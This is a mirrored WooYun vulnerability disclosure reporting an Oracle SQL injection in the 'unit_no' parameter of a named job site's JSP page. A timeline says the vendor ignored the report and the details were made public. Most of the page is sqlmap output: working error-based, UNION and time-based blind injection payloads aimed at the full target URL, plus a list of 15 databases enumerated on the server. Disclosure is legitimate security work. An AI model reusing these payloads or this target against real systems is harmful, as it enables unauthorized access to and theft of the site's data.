乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-12-25: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-02-08: 厂商已经主动忽略漏洞,细节向公众公开
oracle注射
Place: GETParameter: unit_no Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: unit_no=381312002' AND 7892=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(121)||CHR(121)||CHR(118)||CHR(58)||(SELECT (CASE WHEN (7892=7892) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(104)||CHR(112)||CHR(113)||CHR(58)||CHR(62)))FROM DUAL) AND 'hpsA'='hpsA Type: UNION query Title: Generic UNION query (NULL) - 6 columns Payload: unit_no=381312002' UNION ALL SELECT NULL,CHR(58)||CHR(121)||CHR(121)||CHR(118)||CHR(58)||CHR(108)||CHR(111)||CHR(74)||CHR(75)||CHR(103)||CHR(102)||CHR(76)||CHR(72)||CHR(65)||CHR(120)||CHR(58)||CHR(104)||CHR(112)||CHR(113)||CHR(58),NULL,NULL,NULL,NULL FROM DUAL-- Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: unit_no=381312002' AND 1616=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(100)||CHR(87)||CHR(105),5) AND 'UlJq'='UlJq---[22:19:20] [INFO] the back-end DBMS is Oracleweb application technology: JSPback-end DBMS: Oracle
available databases [15]:[*] BBS[*] CORE[*] DBSNMP[*] GZZP[*] IPTV[*] NFRC[*] OEM_JOB168_CPXT[*] OUTLN[*] PERFSTAT[*] SYS[*] SYSMAN[*] SYSTEM[*] TEST[*] TSMSYS[*] WMSYS
www.job168.com/english/person/etcpos.jsp?unit_no=381312002
未能联系到厂商或者厂商积极拒绝